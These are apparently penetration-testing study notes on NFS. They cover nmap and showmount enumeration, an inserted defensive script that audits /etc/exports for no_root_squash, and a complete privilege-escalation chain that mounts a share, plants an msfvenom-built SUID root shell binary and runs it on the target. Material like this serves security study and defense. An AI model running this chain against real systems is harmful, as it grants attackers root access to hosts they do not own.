NFS

Network File System - Port 2049

  • Allows a user on a client computer to access files over a network as if they were local

nmap -sV --script=nfs-showmount <tgt>
showmount -e <tgt>

NFS - Find and Enum

nmap -v -p 111 10.x.x.0/24 -oG nfs.nmap
grep "111/open" nfs.nmap | awk '{print $2}' > nfs.ip
nmap -sV -p111 --script=rpcinfo -iL nfs.ip
ls -l /usr/share/nmap/scripts/nfs*
nmap -p111 --script "nfs*" -iL nfs.ip -oN nfs.enum

NFS - Sweep

  • Wildcard NSE didn't work well

  • Better to run NSE individually or as a Loop

> nmap -sV -p111,2049 10.x.x.0/24 -oG nfs.nmap 
> grep open nfs.nmap | cut -d' ' -f2 > nfs.ip 

> nmap -sV -p111,2049 --script=rpcinfo -iL nfs.ip -oN rpc_scripts.nmap
> nmap -sV -p111 --script "nfs*" -iL nfs.ip -oN nfs_scripts2.nmap

> for vuln in /usr/share/nmap/scripts/nfs*; 
do nmap -p 111 --script "$(basename "$vuln")" 10.11.1.72; done 

NFS Root Squashing

  • Network File System: access to a share is governed by the export options on the server

  • Send a root shell (SUID binary) over NFS: local root on the client is accepted as root on the server

  • Only works if "no_root_squash" is set on the export

  • Remote users can mount the share and access/create/modify files on it

  • Default: created files inherit the remote user's UID/GID, even if that UID does not exist on the NFS server

  • How NFS protects against the obvious privesc: if the remote user claims to be root (uid=0), NFS squashes the request and treats it as nobody (root_squash, the default)

  • That protection can be disabled per export with no_root_squash

-------------------------
showmount -e <tgt>
nmap -sV --script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>

-------------------------
lse.sh -l 2 -i   ..found nfs share
cat /etc/exports
/tmp *(rw,sync,no_root_squash)
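A defender-side check for the condition above, added here as an example (not part of the original notes): a POSIX sh audit of an exports file that flags wildcard client lists and no_root_squash and prints the squashed form of the offending export. The sample exports file is constructed inline; its first line mirrors the one found on the target.

```shell
#!/bin/sh
# Added example (not from the original notes): audit an NFS exports file for
# the two conditions the root-squash attack depends on, a wildcard client list
# and no_root_squash. Prints one WARN per finding; exit status 1 if any found.

audit_exports() {
    exports_file=$1
    findings=0
    set -f   # no pathname expansion: the '*' client in an exports line must stay literal
    while IFS= read -r line || [ -n "$line" ]; do
        # shellcheck disable=SC2086  (word-splitting the export line is intended)
        set -- $line
        [ "$#" -eq 0 ] && continue                 # blank line
        case $1 in '#'*) continue ;; esac          # comment
        path=$1; shift
        for spec in "$@"; do                       # each spec is client(opt,opt,...)
            client=${spec%%\(*}
            opts=${spec#*\(}; opts=${opts%\)}
            case $client in
                ''|'*') printf 'WARN %s: exported to every host (%s)\n' "$path" "$spec"
                        findings=$((findings + 1)) ;;
            esac
            case ",$opts," in
                *,no_root_squash,*)
                    printf 'WARN %s: remote uid 0 is kept as root (%s)\n' "$path" "$spec"
                    printf '     fix: %s %s\n' "$path" "$(printf '%s' "$spec" | sed 's/no_root_squash/root_squash/')"
                    findings=$((findings + 1)) ;;
            esac
        done
    done < "$exports_file"
    set +f
    [ "$findings" -eq 0 ]
}

# Constructed sample exports file; the first export mirrors the one found above.
write_sample_exports() {
    cat > "$1" <<'EOF'
# constructed sample
/tmp *(rw,sync,no_root_squash)
/srv/data 10.0.0.0/24(rw,sync,root_squash)
/home  192.168.1.10(rw,sync)  192.168.1.11(ro)
EOF
}

sample=$(mktemp)
write_sample_exports "$sample"
if audit_exports "$sample"; then echo "no risky exports"; else echo "risky exports found"; fi
rm -f "$sample"
```

Run it against the real file with `audit_exports /etc/exports`; a non-zero exit status makes it usable from a cron job or configuration check.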

-------------------------
Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf

-------------------------
Target:
ls -l /tmp       ..owned by root, with suid
/tmp/shell.elf   ..executed as root
root!!
